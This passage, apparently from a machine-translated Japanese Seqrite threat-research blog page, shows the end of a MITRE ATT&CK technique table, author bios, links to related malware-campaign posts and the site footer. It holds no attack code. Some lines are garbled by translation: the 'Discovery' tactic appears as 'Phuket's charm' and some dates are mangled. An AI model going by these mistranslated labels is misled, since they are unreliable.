プーケットの魅力 T1082 システム情報の発見
プーケットの魅力 T1016 システムネットワーク構成の検出
コマンドおよび制御 T1105 入力ツール転送
コマンドおよび制御 T1071.001 アプリケーション層プロトコル:Webプロトコル
コマンドおよび制御 T1090 プロキシ/リダイレクタの使用

著者

  • ラヤパティ・ラクシュミ・プラサンナ・サイ
  • サトウィック・ラム・プラッキ

 

 以前の投稿250 億ルピーの問題: インドの DPDPA が C 法を書き換える方法
次の投稿  解雇をテーマにした人事部への欺瞞メールがRemcos RATマルウェアを配布
ラヤパティ・ラクシュミ・プラサンナ・サイ

ラヤパティ ラクシュミ プラサンナ サイについて

Rayapati Lakshmi Prasanna Saiは、Quick Heal Security Labのセキュリティ研究者です。マルウェア解析とリバースエンジニアリングに興味を持っています。以前は…

ラヤパティ・ラクシュミ・プラサンナ・サイの記事 »

関連記事

  • 信頼されたビジネスワークフローの悪用:多段階の偽装窃盗キャンペーン

    22年2026月XNUMX日
  • 払い戻しの裏側:GSTフィッシングからRemcos RATまで、多段階の.NET感染チェーン

    17年2026月XNUMX日
  • オペレーション・シャドウリクルート:ControlRとGoogleスプレッドシートを悪用し、インドの求職者を標的とした採用活動をテーマにしたマルウェアキャンペーン

    14年2026月XNUMX日
注目の著者
  • Seqrite
    Seqrite

    Seqrite は、大手企業向けサイバーセキュリティソリューションプロバイダーです。重点分野は…

    より多くの記事を読んで Seqrite
  • ジョティ・カルレカー
    ジョティ・カルレカー

    私は、新興テクノロジーに関するコンテンツの作成を楽しむ熱心なライターです。

    Jyoti Karlekar の記事をもっと読む
  • ビニーシュ・P
    ビニーシュ・P

    私はサイバーセキュリティに情熱を注ぎ、熱心なライターでもあります。得意分野は…

    Bineesh P によるその他の記事を読む
  • サンジェイ・カトカル
    サンジェイ・カトカル

    Sanjay Katkar 氏は、Quick Heal Technologies の共同マネージング ディレクターです。

    サンジャイ・カトカーによるその他の記事を読む
トピック
apt (25) サイバー攻撃 (36) サイバー攻撃 (58) サイバー攻撃 (16) サイバー攻撃 (15) Cybersecurity (341) サイバーセキュリティ (34) サイバー脅威 (33) サイバー脅威 (51) データ侵害 (56) データ侵害 (29) データ損失 (28) データ損失防止 (34) data privacy (16) データ保護 (34) データセキュリティ (19) DLP (50) DPDP (14) DPDPA (17) Encryption (16) エンドポイントセキュリティ (113) エンタープライズセキュリティ (20) 悪用する (13) GDPR (14) マルウェア (76) マルウェア分析 (14) マルウェア攻撃 (23) MDM (27) Microsoft (15) MITER ATT&CK (14) ネットワークセキュリティ (26) フィッシング詐欺 (30) ランサムウェア (69) ransomware攻撃 (31) ransomware攻撃 (31) ransomwareの保護 (17) Seqrite (41) Seqrite Encryption (27) Seqrite EPS (33) Seqrite Services (16) 脅威の検出 (14) Threat Intelライセンス (21) UTM (34) 脆弱性 (16) ゼロトラスト (13)
Seqrite ラボ

世界中でクラス最高の脅威防止、検出、対応ソリューションによりエンドポイント、データ、ネットワークのセキュリティを簡素化する、大手エンタープライズ IT セキュリティ ソリューション プロバイダーです。

続きを読む Seqrite

私たちに従ってください:

ニュースレターに登録

最新のサイバーセキュリティのトレンドと洞察に関する情報を入手してください。

ローディング
製品とサービス
  • クラウド
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • オンプレミス
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Platform
  • Malware Analysis Platform
  • マイクロビジネス
  • SOHO Total Edition
  • Services
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • サイバーセキュリティと Data Privacy Awareness
資料
  • ブログ
  • ホワイトペーパー
  • データシート
  • 脅威レポート
  • マニュアル
  • PoV
  • 理解する Data Privacy
  • DPDP対話
  • ポリシーとコンプライアンス
  • EULA
  • ゴーディープ
  • SIA
  • プライバシーアワー
お問い合わせ
  • 登記事務所
  • サイバーセキュリティについて話しましょう
サポート
  • テクニカルサポート
  • ソフトウェア・ダウンロード
  • オフラインアップデータ
  • ファームウェア・アップグレード
  • アップグレード
  • 製品ドキュメント
私たちに関しては
  • 学校区概要 Seqrite
  • リーダーシップ
  • 受賞
  • ニュースルーム
パートナー
  • パートナープログラム
  • パートナーを探す
  • パートナーになる
  • Seqrite 認定

© 2026 クイックヒールテクノロジーズ株式会社

サイトマップ プライバシーポリシー 法的通知 クッキーポリシー 利用規約